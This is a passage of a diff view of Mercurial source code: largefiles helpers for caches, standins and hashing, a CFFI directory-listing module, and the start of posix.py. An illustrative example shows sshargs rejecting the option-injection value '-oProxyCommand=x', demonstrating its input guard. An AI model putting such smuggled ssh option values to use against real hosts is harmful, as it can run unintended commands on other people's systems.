87 87 path = encoding.environ.get('XDG_CACHE_HOME')
88 88 if path:
89 89 return os.path.join(path, longname)
90 90 home = encoding.environ.get('HOME')
91 91 if home:
92 92 return os.path.join(home, '.cache', longname)
93 93 else:
94 94 raise error.Abort(_('unknown operating system: %s\n')
95 95 % pycompat.osname)
96 96 raise error.Abort(_('unknown %s usercache location') % longname)
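# For illustration (hypothetical environments): with HOME=/Users/alice the
# Darwin branch above yields /Users/alice/Library/Caches/largefiles, while a
# POSIX system with XDG_CACHE_HOME=/home/alice/.cache yields
# /home/alice/.cache/largefiles.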
97 97
98 98 def inusercache(ui, hash):
99 99 path = usercachepath(ui, hash)
100 100 return os.path.exists(path)
101 101
102 102 def findfile(repo, hash):
103 103 '''Return store path of the largefile with the specified hash.
104 104 As a side effect, the file might be linked from user cache.
105 105 Return None if the file can't be found locally.'''
106 106 path, exists = findstorepath(repo, hash)
107 107 if exists:
108 108 repo.ui.note(_('found %s in store\n') % hash)
109 109 return path
110 110 elif inusercache(repo.ui, hash):
111 111 repo.ui.note(_('found %s in system cache\n') % hash)
112 112 path = storepath(repo, hash)
113 113 link(usercachepath(repo.ui, hash), path)
114 114 return path
115 115 return None
116 116
117 117 class largefilesdirstate(dirstate.dirstate):
118 118 def __getitem__(self, key):
119 119 return super(largefilesdirstate, self).__getitem__(unixpath(key))
120 120 def normal(self, f):
121 121 return super(largefilesdirstate, self).normal(unixpath(f))
122 122 def remove(self, f):
123 123 return super(largefilesdirstate, self).remove(unixpath(f))
124 124 def add(self, f):
125 125 return super(largefilesdirstate, self).add(unixpath(f))
126 126 def drop(self, f):
127 127 return super(largefilesdirstate, self).drop(unixpath(f))
128 128 def forget(self, f):
129 129 return super(largefilesdirstate, self).forget(unixpath(f))
130 130 def normallookup(self, f):
131 131 return super(largefilesdirstate, self).normallookup(unixpath(f))
132 132 def _ignore(self, f):
133 133 return False
134 134 def write(self, tr=False):
135 135 # (1) disable PENDING mode always
136 136 # (lfdirstate isn't yet managed as a part of the transaction)
137 137 # (2) avoid develwarn 'use dirstate.write with ....'
138 138 super(largefilesdirstate, self).write(None)
139 139
140 140 def openlfdirstate(ui, repo, create=True):
141 141 '''
142 142 Return a dirstate object that tracks largefiles: i.e. its root is
143 143 the repo root, but it is saved in .hg/largefiles/dirstate.
144 144 '''
145 145 vfs = repo.vfs
146 146 lfstoredir = longname
147 147 opener = vfsmod.vfs(vfs.join(lfstoredir))
148 148 lfdirstate = largefilesdirstate(opener, ui, repo.root,
149 149 repo.dirstate._validate,
150 150 lambda: sparse.matcher(repo))
151 151
152 152 # If the largefiles dirstate does not exist, populate and create
153 153 # it. This ensures that we create it on the first meaningful
154 154 # largefiles operation in a new clone.
155 155 if create and not vfs.exists(vfs.join(lfstoredir, 'dirstate')):
156 156 matcher = getstandinmatcher(repo)
157 157 standins = repo.dirstate.walk(matcher, subrepos=[], unknown=False,
158 158 ignored=False)
159 159
160 160 if len(standins) > 0:
161 161 vfs.makedirs(lfstoredir)
162 162
163 163 for standin in standins:
164 164 lfile = splitstandin(standin)
165 165 lfdirstate.normallookup(lfile)
166 166 return lfdirstate
167 167
168 168 def lfdirstatestatus(lfdirstate, repo):
169 169 pctx = repo['.']
170 170 match = matchmod.always(repo.root, repo.getcwd())
171 171 unsure, s = lfdirstate.status(match, subrepos=[], ignored=False,
172 172 clean=False, unknown=False)
173 173 modified, clean = s.modified, s.clean
174 174 for lfile in unsure:
175 175 try:
176 176 fctx = pctx[standin(lfile)]
177 177 except LookupError:
178 178 fctx = None
179 179 if not fctx or readasstandin(fctx) != hashfile(repo.wjoin(lfile)):
180 180 modified.append(lfile)
181 181 else:
182 182 clean.append(lfile)
183 183 lfdirstate.normal(lfile)
184 184 return s
185 185
186 186 def listlfiles(repo, rev=None, matcher=None):
187 187 '''return a list of largefiles in the working copy or the
188 188 specified changeset'''
189 189
190 190 if matcher is None:
191 191 matcher = getstandinmatcher(repo)
192 192
193 193 # ignore unknown files in working directory
194 194 return [splitstandin(f)
195 195 for f in repo[rev].walk(matcher)
196 196 if rev is not None or repo.dirstate[f] != '?']
197 197
198 198 def instore(repo, hash, forcelocal=False):
199 199 '''Return true if a largefile with the given hash exists in the store'''
200 200 return os.path.exists(storepath(repo, hash, forcelocal))
201 201
202 202 def storepath(repo, hash, forcelocal=False):
203 203 '''Return the correct location in the repository largefiles store for a
204 204 file with the given hash.'''
205 205 if not forcelocal and repo.shared():
206 206 return repo.vfs.reljoin(repo.sharedpath, longname, hash)
207 207 return repo.vfs.join(longname, hash)
208 208
209 209 def findstorepath(repo, hash):
210 210 '''Search through the local store path(s) to find the file for the given
211 211 hash. If the file is not found, its path in the primary store is returned.
212 212 The return value is a tuple of (path, exists(path)).
213 213 '''
214 214 # For shared repos, the primary store is in the share source. But for
215 215 # backward compatibility, force a lookup in the local store if it wasn't
216 216 # found in the share source.
217 217 path = storepath(repo, hash, False)
218 218
219 219 if instore(repo, hash):
220 220 return (path, True)
221 221 elif repo.shared() and instore(repo, hash, True):
222 222 return storepath(repo, hash, True), True
223 223
224 224 return (path, False)
225 225
226 226 def copyfromcache(repo, hash, filename):
227 227 '''Copy the specified largefile from the repo or system cache to
228 228 filename in the repository. Return true on success or false if the
229 229 file was not found in either cache (which should not happen:
230 230 this is meant to be called only after ensuring that the needed
231 231 largefile exists in the cache).'''
232 232 wvfs = repo.wvfs
233 233 path = findfile(repo, hash)
234 234 if path is None:
235 235 return False
236 236 wvfs.makedirs(wvfs.dirname(wvfs.join(filename)))
237 237 # The write may fail before the file is fully written, but we
238 238 # don't use atomic writes in the working copy.
239 239 with open(path, 'rb') as srcfd, wvfs(filename, 'wb') as destfd:
240 240 gothash = copyandhash(
241 241 util.filechunkiter(srcfd), destfd)
242 242 if gothash != hash:
243 243 repo.ui.warn(_('%s: data corruption in %s with hash %s\n')
244 244 % (filename, path, gothash))
245 245 wvfs.unlink(filename)
246 246 return False
247 247 return True
248 248
249 249 def copytostore(repo, ctx, file, fstandin):
250 250 wvfs = repo.wvfs
251 251 hash = readasstandin(ctx[fstandin])
252 252 if instore(repo, hash):
253 253 return
254 254 if wvfs.exists(file):
255 255 copytostoreabsolute(repo, wvfs.join(file), hash)
256 256 else:
257 257 repo.ui.warn(_("%s: largefile %s not available from local store\n") %
258 258 (file, hash))
259 259
260 260 def copyalltostore(repo, node):
261 261 '''Copy all largefiles in a given revision to the store'''
262 262
263 263 ctx = repo[node]
264 264 for filename in ctx.files():
265 265 realfile = splitstandin(filename)
266 266 if realfile is not None and filename in ctx.manifest():
267 267 copytostore(repo, ctx, realfile, filename)
268 268
269 269 def copytostoreabsolute(repo, file, hash):
270 270 if inusercache(repo.ui, hash):
271 271 link(usercachepath(repo.ui, hash), storepath(repo, hash))
272 272 else:
273 273 util.makedirs(os.path.dirname(storepath(repo, hash)))
274 274 with open(file, 'rb') as srcf:
275 275 with util.atomictempfile(storepath(repo, hash),
276 276 createmode=repo.store.createmode) as dstf:
277 277 for chunk in util.filechunkiter(srcf):
278 278 dstf.write(chunk)
279 279 linktousercache(repo, hash)
280 280
281 281 def linktousercache(repo, hash):
282 282 '''Link / copy the largefile with the specified hash from the store
283 283 to the cache.'''
284 284 path = usercachepath(repo.ui, hash)
285 285 link(storepath(repo, hash), path)
286 286
287 287 def getstandinmatcher(repo, rmatcher=None):
288 288 '''Return a match object that applies rmatcher to the standin directory'''
289 289 wvfs = repo.wvfs
290 290 standindir = shortname
291 291
292 292 # no warnings about missing files or directories
293 293 badfn = lambda f, msg: None
294 294
295 295 if rmatcher and not rmatcher.always():
296 296 pats = [wvfs.join(standindir, pat) for pat in rmatcher.files()]
297 297 if not pats:
298 298 pats = [wvfs.join(standindir)]
299 299 match = scmutil.match(repo[None], pats, badfn=badfn)
300 300 else:
301 301 # no patterns: relative to repo root
302 302 match = scmutil.match(repo[None], [wvfs.join(standindir)], badfn=badfn)
303 303 return match
304 304
305 305 def composestandinmatcher(repo, rmatcher):
306 306 '''Return a matcher that accepts standins corresponding to the
307 307 files accepted by rmatcher. Pass the list of files in the matcher
308 308 as the paths specified by the user.'''
309 309 smatcher = getstandinmatcher(repo, rmatcher)
310 310 isstandin = smatcher.matchfn
311 311 def composedmatchfn(f):
312 312 return isstandin(f) and rmatcher.matchfn(splitstandin(f))
313 313 smatcher.matchfn = composedmatchfn
314 314
315 315 return smatcher
316 316
317 317 def standin(filename):
318 318 '''Return the repo-relative path to the standin for the specified big
319 319 file.'''
320 320 # Notes:
321 321 # 1) Some callers want an absolute path, but for instance addlargefiles
322 322 # needs it repo-relative so it can be passed to repo[None].add(). So
323 323 # leave it up to the caller to use repo.wjoin() to get an absolute path.
324 324 # 2) Join with '/' because that's what dirstate always uses, even on
325 325 # Windows. Change existing separator to '/' first in case we are
326 326 # passed filenames from an external source (like the command line).
327 327 return shortnameslash + util.pconvert(filename)
328 328
329 329 def isstandin(filename):
330 330 '''Return true if filename is a big file standin. filename must be
331 331 in Mercurial's internal form (slash-separated).'''
332 332 return filename.startswith(shortnameslash)
333 333
334 334 def splitstandin(filename):
335 335 # Split on / because that's what dirstate always uses, even on Windows.
336 336 # Change local separator to / first just in case we are passed filenames
337 337 # from an external source (like the command line).
338 338 bits = util.pconvert(filename).split('/', 1)
339 339 if len(bits) == 2 and bits[0] == shortname:
340 340 return bits[1]
341 341 else:
342 342 return None
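# Round-trip example (illustrative): standin('foo/bar.bin') returns
# '.hglf/foo/bar.bin'; splitstandin('.hglf/foo/bar.bin') returns
# 'foo/bar.bin'; and splitstandin('foo/bar.bin') returns None.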
343 343
344 344 def updatestandin(repo, lfile, standin):
345 345 """Re-calculate hash value of lfile and write it into standin
346 346
347 347 This assumes that "lfutil.standin(lfile) == standin", for efficiency.
348 348 """
349 349 file = repo.wjoin(lfile)
350 350 if repo.wvfs.exists(lfile):
351 351 hash = hashfile(file)
352 352 executable = getexecutable(file)
353 353 writestandin(repo, standin, hash, executable)
354 354 else:
355 355 raise error.Abort(_('%s: file not found!') % lfile)
356 356
357 357 def readasstandin(fctx):
358 358 '''read hex hash from given filectx of standin file
359 359
360 360 This encapsulates how "standin" data is stored in the storage layer.'''
361 361 return fctx.data().strip()
362 362
363 363 def writestandin(repo, standin, hash, executable):
364 364 '''write hash to <repo.root>/<standin>'''
365 365 repo.wwrite(standin, hash + '\n', executable and 'x' or '')
366 366
367 367 def copyandhash(instream, outfile):
368 368 '''Read bytes from instream (iterable) and write them to outfile,
369 369 computing the SHA-1 hash of the data along the way. Return the hash.'''
370 370 hasher = hashlib.sha1('')
371 371 for data in instream:
372 372 hasher.update(data)
373 373 outfile.write(data)
374 374 return hasher.hexdigest()
375 375
376 376 def hashfile(file):
377 377 if not os.path.exists(file):
378 378 return ''
379 379 with open(file, 'rb') as fd:
380 380 return hexsha1(fd)
381 381
382 382 def getexecutable(filename):
383 383 mode = os.stat(filename).st_mode
384 384 return ((mode & stat.S_IXUSR) and
385 385 (mode & stat.S_IXGRP) and
386 386 (mode & stat.S_IXOTH))
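# Note (illustrative): this is truthy only when all three execute bits are
# set, e.g. a mode of 0o755 qualifies while 0o744 does not.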
387 387
388 388 def urljoin(first, second, *arg):
389 389 def join(left, right):
390 390 if not left.endswith('/'):
391 391 left += '/'
392 392 if right.startswith('/'):
393 393 right = right[1:]
394 394 return left + right
395 395
396 396 url = join(first, second)
397 397 for a in arg:
398 398 url = join(url, a)
399 399 return url
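# Example (illustrative): urljoin('http://host/a/', '/b', 'c') yields
# 'http://host/a/b/c'; exactly one slash is kept at each join point.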
400 400
401 401 def hexsha1(fileobj):
402 402 """hexsha1 returns the hex-encoded sha1 sum of the data in the file-like
403 403 object data"""
404 404 h = hashlib.sha1()
405 405 for chunk in util.filechunkiter(fileobj):
406 406 h.update(chunk)
407 407 return h.hexdigest()
408 408
409 409 def httpsendfile(ui, filename):
410 410 return httpconnection.httpsendfile(ui, filename, 'rb')
411 411
412 412 def unixpath(path):
413 413 '''Return a version of path normalized for use with the lfdirstate.'''
414 414 return util.pconvert(os.path.normpath(path))
415 415
416 416 def islfilesrepo(repo):
417 417 '''Return true if the repo is a largefile repo.'''
418 418 if ('largefiles' in repo.requirements and
419 419 any(shortnameslash in f[0] for f in repo.store.datafiles())):
420 420 return True
421 421
422 422 return any(openlfdirstate(repo.ui, repo, False))
423 423
424 424 class storeprotonotcapable(Exception):
425 425 def __init__(self, storetypes):
426 426 self.storetypes = storetypes
427 427
428 428 def getstandinsstate(repo):
429 429 standins = []
430 430 matcher = getstandinmatcher(repo)
431 431 wctx = repo[None]
432 432 for standin in repo.dirstate.walk(matcher, subrepos=[], unknown=False,
433 433 ignored=False):
434 434 lfile = splitstandin(standin)
435 435 try:
436 436 hash = readasstandin(wctx[standin])
437 437 except IOError:
438 438 hash = None
439 439 standins.append((lfile, hash))
440 440 return standins
441 441
442 442 def synclfdirstate(repo, lfdirstate, lfile, normallookup):
443 443 lfstandin = standin(lfile)
444 444 if lfstandin in repo.dirstate:
445 445 stat = repo.dirstate._map[lfstandin]
446 446 state, mtime = stat[0], stat[3]
447 447 else:
448 448 state, mtime = '?', -1
449 449 if state == 'n':
450 450 if (normallookup or mtime < 0 or
451 451 not repo.wvfs.exists(lfile)):
452 452 # state 'n' doesn't ensure 'clean' in this case
453 453 lfdirstate.normallookup(lfile)
454 454 else:
455 455 lfdirstate.normal(lfile)
456 456 elif state == 'm':
457 457 lfdirstate.normallookup(lfile)
458 458 elif state == 'r':
459 459 lfdirstate.remove(lfile)
460 460 elif state == 'a':
461 461 lfdirstate.add(lfile)
462 462 elif state == '?':
463 463 lfdirstate.drop(lfile)
464 464
465 465 def markcommitted(orig, ctx, node):
466 466 repo = ctx.repo()
467 467
468 468 orig(node)
469 469
470 470 # ATTENTION: "ctx.files()" may differ from "repo[node].files()"
471 471 # because files coming from the 2nd parent are omitted in the latter.
472 472 #
473 473 # The former should be used to get targets of "synclfdirstate",
474 474 # because such files:
475 475 # - are marked as "a" by "patch.patch()" (e.g. via transplant), and
476 476 # - have to be marked as "n" after commit, but
477 477 # - aren't listed in "repo[node].files()"
478 478
479 479 lfdirstate = openlfdirstate(repo.ui, repo)
480 480 for f in ctx.files():
481 481 lfile = splitstandin(f)
482 482 if lfile is not None:
483 483 synclfdirstate(repo, lfdirstate, lfile, False)
484 484 lfdirstate.write()
485 485
486 486 # As part of committing, copy all of the largefiles into the cache.
487 487 #
488 488 # Using "node" instead of "ctx" implies additional "repo[node]"
489 489 # lookup in copyalltostore(), but can omit a redundant check for
490 490 # files coming from the 2nd parent, which should exist in the store
491 491 # at merging.
492 492 copyalltostore(repo, node)
493 493
494 494 def getlfilestoupdate(oldstandins, newstandins):
495 495 changedstandins = set(oldstandins).symmetric_difference(set(newstandins))
496 496 filelist = []
497 497 for f in changedstandins:
498 498 if f[0] not in filelist:
499 499 filelist.append(f[0])
500 500 return filelist
501 501
502 502 def getlfilestoupload(repo, missing, addfunc):
503 503 for i, n in enumerate(missing):
504 504 repo.ui.progress(_('finding outgoing largefiles'), i,
505 505 unit=_('revisions'), total=len(missing))
506 506 parents = [p for p in repo[n].parents() if p != node.nullid]
507 507
508 508 oldlfstatus = repo.lfstatus
509 509 repo.lfstatus = False
510 510 try:
511 511 ctx = repo[n]
512 512 finally:
513 513 repo.lfstatus = oldlfstatus
514 514
515 515 files = set(ctx.files())
516 516 if len(parents) == 2:
517 517 mc = ctx.manifest()
518 518 mp1 = ctx.parents()[0].manifest()
519 519 mp2 = ctx.parents()[1].manifest()
520 520 for f in mp1:
521 521 if f not in mc:
522 522 files.add(f)
523 523 for f in mp2:
524 524 if f not in mc:
525 525 files.add(f)
526 526 for f in mc:
527 527 if mc[f] != mp1.get(f, None) or mc[f] != mp2.get(f, None):
528 528 files.add(f)
529 529 for fn in files:
530 530 if isstandin(fn) and fn in ctx:
531 531 addfunc(fn, readasstandin(ctx[fn]))
532 532 repo.ui.progress(_('finding outgoing largefiles'), None)
533 533
534 534 def updatestandinsbymatch(repo, match):
535 535 '''Update standins in the working directory according to specified match
536 536
537 537 This returns (possibly modified) ``match`` object to be used for
538 538 subsequent commit process.
539 539 '''
540 540
541 541 ui = repo.ui
542 542
543 543 # Case 1: user calls commit with no specific files or
544 544 # include/exclude patterns: refresh and commit all files that
545 545 # are "dirty".
546 546 if match is None or match.always():
547 547 # Spend a bit of time here to get a list of files we know
548 548 # are modified so we can compare only against those.
549 549 # It can cost a lot of time (several seconds)
550 550 # otherwise to update all standins if the largefiles are
551 551 # large.
552 552 lfdirstate = openlfdirstate(ui, repo)
553 553 dirtymatch = matchmod.always(repo.root, repo.getcwd())
554 554 unsure, s = lfdirstate.status(dirtymatch, subrepos=[], ignored=False,
555 555 clean=False, unknown=False)
556 556 modifiedfiles = unsure + s.modified + s.added + s.removed
557 557 lfiles = listlfiles(repo)
558 558 # this only loops through largefiles that exist (not
559 559 # removed/renamed)
560 560 for lfile in lfiles:
561 561 if lfile in modifiedfiles:
562 562 fstandin = standin(lfile)
563 563 if repo.wvfs.exists(fstandin):
564 564 # this handles the case where a rebase is being
565 565 # performed and the working copy is not updated
566 566 # yet.
567 567 if repo.wvfs.exists(lfile):
568 568 updatestandin(repo, lfile, fstandin)
569 569
570 570 return match
571 571
572 572 lfiles = listlfiles(repo)
573 573 match._files = repo._subdirlfs(match.files(), lfiles)
574 574
575 575 # Case 2: user calls commit with specified patterns: refresh
576 576 # any matching big files.
577 577 smatcher = composestandinmatcher(repo, match)
578 578 standins = repo.dirstate.walk(smatcher, subrepos=[], unknown=False,
579 579 ignored=False)
580 580
581 581 # No matching big files: get out of the way and pass control to
582 582 # the usual commit() method.
583 583 if not standins:
584 584 return match
585 585
586 586 # Refresh all matching big files. It's possible that the
587 587 # commit will end up failing, in which case the big files will
588 588 # stay refreshed. No harm done: the user modified them and
589 589 # asked to commit them, so sooner or later we're going to
590 590 # refresh the standins. Might as well leave them refreshed.
591 591 lfdirstate = openlfdirstate(ui, repo)
592 592 for fstandin in standins:
593 593 lfile = splitstandin(fstandin)
594 594 if lfdirstate[lfile] != 'r':
595 595 updatestandin(repo, lfile, fstandin)
596 596
597 597 # Cook up a new matcher that only matches regular files or
598 598 # standins corresponding to the big files requested by the
599 599 # user. Have to modify _files to prevent commit() from
600 600 # complaining "not tracked" for big files.
601 601 match = copy.copy(match)
602 602 origmatchfn = match.matchfn
603 603
604 604 # Check both the list of largefiles and the list of
605 605 # standins because if a largefile was removed, it
606 606 # won't be in the list of largefiles at this point
607 607 match._files += sorted(standins)
608 608
609 609 actualfiles = []
610 610 for f in match._files:
611 611 fstandin = standin(f)
612 612
613 613 # For largefiles, only one of the normal and standin should be
614 614 # committed (except if one of them is a remove). In the case of a
615 615 # standin removal, drop the normal file if it is unknown to dirstate.
616 616 # Thus, skip plain largefile names but keep the standin.
617 617 if f in lfiles or fstandin in standins:
618 618 if repo.dirstate[fstandin] != 'r':
619 619 if repo.dirstate[f] != 'r':
620 620 continue
621 621 elif repo.dirstate[f] == '?':
622 622 continue
623 623
624 624 actualfiles.append(f)
625 625 match._files = actualfiles
626 626
627 627 def matchfn(f):
628 628 if origmatchfn(f):
629 629 return f not in lfiles
630 630 else:
631 631 return f in standins
632 632
633 633 match.matchfn = matchfn
634 634
635 635 return match
636 636
637 637 class automatedcommithook(object):
638 638 '''Stateful hook to update standins at the 1st commit of resuming
639 639
640 640 For efficiency, updating standins in the working directory should
641 641 be avoided while automated committing (like rebase, transplant and
642 642 so on), because they should be updated before committing.
643 643
644 644 But the 1st commit of resuming automated committing (e.g. ``rebase
645 645 --continue``) should update them, because largefiles may be
646 646 modified manually.
647 647 '''
648 648 def __init__(self, resuming):
649 649 self.resuming = resuming
650 650
651 651 def __call__(self, repo, match):
652 652 if self.resuming:
653 653 self.resuming = False # avoids updating at subsequent commits
654 654 return updatestandinsbymatch(repo, match)
655 655 else:
656 656 return match
657 657
658 658 def getstatuswriter(ui, repo, forcibly=None):
659 659 '''Return the function to write largefiles specific status out
660 660
661 661 If ``forcibly`` is ``None``, this returns the last element of
662 662 ``repo._lfstatuswriters`` as "default" writer function.
663 663
664 664 Otherwise, this returns the function to always write out (or
665 665 ignore if ``not forcibly``) status.
666 666 '''
667 667 if forcibly is None and util.safehasattr(repo, '_largefilesenabled'):
668 668 return repo._lfstatuswriters[-1]
669 669 else:
670 670 if forcibly:
671 671 return ui.status # forcibly WRITE OUT
672 672 else:
673 673 return lambda *msg, **opts: None # forcibly IGNORE
@@ -1,102 +1,102 @@ mercurial/cffi/osutil.py
1 1 # osutil.py - CFFI version of osutil.c
2 2 #
3 3 # Copyright 2016 Maciej Fijalkowski <fijall@gmail.com>
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 8 from __future__ import absolute_import
9 9
10 10 import os
11 11 import stat as statmod
12 12
13 13 from ..pure.osutil import *
14 14
15 15 from .. import (
16 16 pycompat,
17 17 )
18 18
19 - if pycompat.sysplatform == 'darwin':
19 + if pycompat.isdarwin:
20 20 from . import _osutil
21 21
22 22 ffi = _osutil.ffi
23 23 lib = _osutil.lib
24 24
25 25 listdir_batch_size = 4096
26 26 # tweakable number; only affects performance by controlling the size
27 27 # of the byte chunks we get back from getattrlistbulk
28 28
29 29 attrkinds = [None] * 20 # we need the max number for the VXXX enum; 20 is plenty
30 30
31 31 attrkinds[lib.VREG] = statmod.S_IFREG
32 32 attrkinds[lib.VDIR] = statmod.S_IFDIR
33 33 attrkinds[lib.VLNK] = statmod.S_IFLNK
34 34 attrkinds[lib.VBLK] = statmod.S_IFBLK
35 35 attrkinds[lib.VCHR] = statmod.S_IFCHR
36 36 attrkinds[lib.VFIFO] = statmod.S_IFIFO
37 37 attrkinds[lib.VSOCK] = statmod.S_IFSOCK
38 38
39 39 class stat_res(object):
40 40 def __init__(self, st_mode, st_mtime, st_size):
41 41 self.st_mode = st_mode
42 42 self.st_mtime = st_mtime
43 43 self.st_size = st_size
44 44
45 45 tv_sec_ofs = ffi.offsetof("struct timespec", "tv_sec")
46 46 buf = ffi.new("char[]", listdir_batch_size)
47 47
48 48 def listdirinternal(dfd, req, stat, skip):
49 49 ret = []
50 50 while True:
51 51 r = lib.getattrlistbulk(dfd, req, buf, listdir_batch_size, 0)
52 52 if r == 0:
53 53 break
54 54 if r == -1:
55 55 raise OSError(ffi.errno, os.strerror(ffi.errno))
56 56 cur = ffi.cast("val_attrs_t*", buf)
57 57 for i in range(r):
58 58 lgt = cur.length
59 59 assert lgt == ffi.cast('uint32_t*', cur)[0]
60 60 ofs = cur.name_info.attr_dataoffset
61 61 str_lgt = cur.name_info.attr_length
62 62 base_ofs = ffi.offsetof('val_attrs_t', 'name_info')
63 63 name = str(ffi.buffer(ffi.cast("char*", cur) + base_ofs + ofs,
64 64 str_lgt - 1))
65 65 tp = attrkinds[cur.obj_type]
66 66 if name == "." or name == "..":
67 67 continue
68 68 if skip == name and tp == statmod.S_IFDIR: # S_ISDIR is a function, not a mode
69 69 return []
70 70 if stat:
71 71 mtime = cur.mtime.tv_sec
72 72 mode = (cur.accessmask & ~lib.S_IFMT) | tp
73 73 ret.append((name, tp, stat_res(st_mode=mode, st_mtime=mtime,
74 74 st_size=cur.datalength)))
75 75 else:
76 76 ret.append((name, tp))
77 77 cur = ffi.cast("val_attrs_t*", int(ffi.cast("intptr_t", cur))
78 78 + lgt)
79 79 return ret
80 80
81 81 def listdir(path, stat=False, skip=None):
82 82 req = ffi.new("struct attrlist*")
83 83 req.bitmapcount = lib.ATTR_BIT_MAP_COUNT
84 84 req.commonattr = (lib.ATTR_CMN_RETURNED_ATTRS |
85 85 lib.ATTR_CMN_NAME |
86 86 lib.ATTR_CMN_OBJTYPE |
87 87 lib.ATTR_CMN_ACCESSMASK |
88 88 lib.ATTR_CMN_MODTIME)
89 89 req.fileattr = lib.ATTR_FILE_DATALENGTH
90 90 dfd = lib.open(path, lib.O_RDONLY, 0)
91 91 if dfd == -1:
92 92 raise OSError(ffi.errno, os.strerror(ffi.errno))
93 93
94 94 try:
95 95 ret = listdirinternal(dfd, req, stat, skip)
96 96 finally:
97 97 try:
98 98 lib.close(dfd)
99 99 except BaseException:
100 100 pass # we ignore all errors from closing; there is not
101 101 # much we can do about that
102 102 return ret
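For reference, a hedged sketch of calling this module directly; it only applies on Darwin, where the CFFI bindings are built, and the path is illustrative::

    from mercurial.cffi import osutil

    # stat=True yields (name, kind, stat_res) triples; stat=False yields pairs
    for name, kind, st in osutil.listdir('/tmp', stat=True):
        print(name, oct(st.st_mode), st.st_size)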
@@ -1,675 +1,675 b''
1 1 # posix.py - Posix utility function implementations for Mercurial
2 2 #
3 3 # Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 8 from __future__ import absolute_import
9 9
10 10 import errno
11 11 import fcntl
12 12 import getpass
13 13 import grp
14 14 import os
15 15 import pwd
16 16 import re
17 17 import select
18 18 import stat
19 19 import sys
20 20 import tempfile
21 21 import unicodedata
22 22
23 23 from .i18n import _
24 24 from . import (
25 25 encoding,
26 26 error,
27 27 pycompat,
28 28 )
29 29
30 30 posixfile = open
31 31 normpath = os.path.normpath
32 32 samestat = os.path.samestat
33 33 try:
34 34 oslink = os.link
35 35 except AttributeError:
36 36 # Some platforms build Python without os.link on systems that are
37 37 # vaguely unix-like but don't have hardlink support. For those
38 38 # poor souls, just say we tried and that it failed so we fall back
39 39 # to copies.
40 40 def oslink(src, dst):
41 41 raise OSError(errno.EINVAL,
42 42 'hardlinks not supported: %s to %s' % (src, dst))
43 43 unlink = os.unlink
44 44 rename = os.rename
45 45 removedirs = os.removedirs
46 46 expandglobs = False
47 47
48 48 umask = os.umask(0)
49 49 os.umask(umask)
50 50
51 51 def split(p):
52 52 '''Same as posixpath.split, but faster
53 53
54 54 >>> import posixpath
55 55 >>> for f in [b'/absolute/path/to/file',
56 56 ... b'relative/path/to/file',
57 57 ... b'file_alone',
58 58 ... b'path/to/directory/',
59 59 ... b'/multiple/path//separators',
60 60 ... b'/file_at_root',
61 61 ... b'///multiple_leading_separators_at_root',
62 62 ... b'']:
63 63 ... assert split(f) == posixpath.split(f), f
64 64 '''
65 65 ht = p.rsplit('/', 1)
66 66 if len(ht) == 1:
67 67 return '', p
68 68 nh = ht[0].rstrip('/')
69 69 if nh:
70 70 return nh, ht[1]
71 71 return ht[0] + '/', ht[1]
72 72
73 73 def openhardlinks():
74 74 '''return true if it is safe to hold open file handles to hardlinks'''
75 75 return True
76 76
77 77 def nlinks(name):
78 78 '''return number of hardlinks for the given file'''
79 79 return os.lstat(name).st_nlink
80 80
81 81 def parsepatchoutput(output_line):
82 82 """parses the output produced by patch and returns the filename"""
83 83 pf = output_line[14:]
84 84 if pycompat.sysplatform == 'OpenVMS':
85 85 if pf[0] == '`':
86 86 pf = pf[1:-1] # Remove the quotes
87 87 else:
88 88 if pf.startswith("'") and pf.endswith("'") and " " in pf:
89 89 pf = pf[1:-1] # Remove the quotes
90 90 return pf
91 91
92 92 def sshargs(sshcmd, host, user, port):
93 93 '''Build argument list for ssh'''
94 94 args = user and ("%s@%s" % (user, host)) or host
95 95 if '-' in args[:1]:
96 96 raise error.Abort(
97 97 _('illegal ssh hostname or username starting with -: %s') % args)
98 98 args = shellquote(args)
99 99 if port:
100 100 args = '-p %s %s' % (shellquote(port), args)
101 101 return args
102 102
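Illustrative inputs and outputs (hypothetical host names), showing the quoting and the leading-dash guard; note that ``@`` makes shellquote wrap the argument::

    sshargs('ssh', 'example.com', None, None)
    # -> 'example.com'
    sshargs('ssh', 'example.com', 'alice', '2222')
    # -> "-p 2222 'alice@example.com'"
    sshargs('ssh', '-oProxyCommand=x', None, None)
    # -> raises error.Abort (hostname starting with '-')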
103 103 def isexec(f):
104 104 """check whether a file is executable"""
105 105 return (os.lstat(f).st_mode & 0o100 != 0)
106 106
107 107 def setflags(f, l, x):
108 108 st = os.lstat(f)
109 109 s = st.st_mode
110 110 if l:
111 111 if not stat.S_ISLNK(s):
112 112 # switch file to link
113 113 fp = open(f)
114 114 data = fp.read()
115 115 fp.close()
116 116 unlink(f)
117 117 try:
118 118 os.symlink(data, f)
119 119 except OSError:
120 120 # failed to make a link, rewrite file
121 121 fp = open(f, "w")
122 122 fp.write(data)
123 123 fp.close()
124 124 # no chmod needed at this point
125 125 return
126 126 if stat.S_ISLNK(s):
127 127 # switch link to file
128 128 data = os.readlink(f)
129 129 unlink(f)
130 130 fp = open(f, "w")
131 131 fp.write(data)
132 132 fp.close()
133 133 s = 0o666 & ~umask # avoid restatting for chmod
134 134
135 135 sx = s & 0o100
136 136 if st.st_nlink > 1 and bool(x) != bool(sx):
137 137 # the file is a hardlink, break it
138 138 with open(f, "rb") as fp:
139 139 data = fp.read()
140 140 unlink(f)
141 141 with open(f, "wb") as fp:
142 142 fp.write(data)
143 143
144 144 if x and not sx:
145 145 # Turn on +x for every +r bit when making a file executable
146 146 # and obey umask.
147 147 os.chmod(f, s | (s & 0o444) >> 2 & ~umask)
148 148 elif not x and sx:
149 149 # Turn off all +x bits
150 150 os.chmod(f, s & 0o666)
151 151
152 152 def copymode(src, dst, mode=None):
153 153 '''Copy the file mode from the file at path src to dst.
154 154 If src doesn't exist, mode is used instead. If mode is None, the
155 155 umask is used.'''
156 156 try:
157 157 st_mode = os.lstat(src).st_mode & 0o777
158 158 except OSError as inst:
159 159 if inst.errno != errno.ENOENT:
160 160 raise
161 161 st_mode = mode
162 162 if st_mode is None:
163 163 st_mode = ~umask
164 164 st_mode &= 0o666
165 165 os.chmod(dst, st_mode)
166 166
167 167 def checkexec(path):
168 168 """
169 169 Check whether the given path is on a filesystem with UNIX-like exec flags
170 170
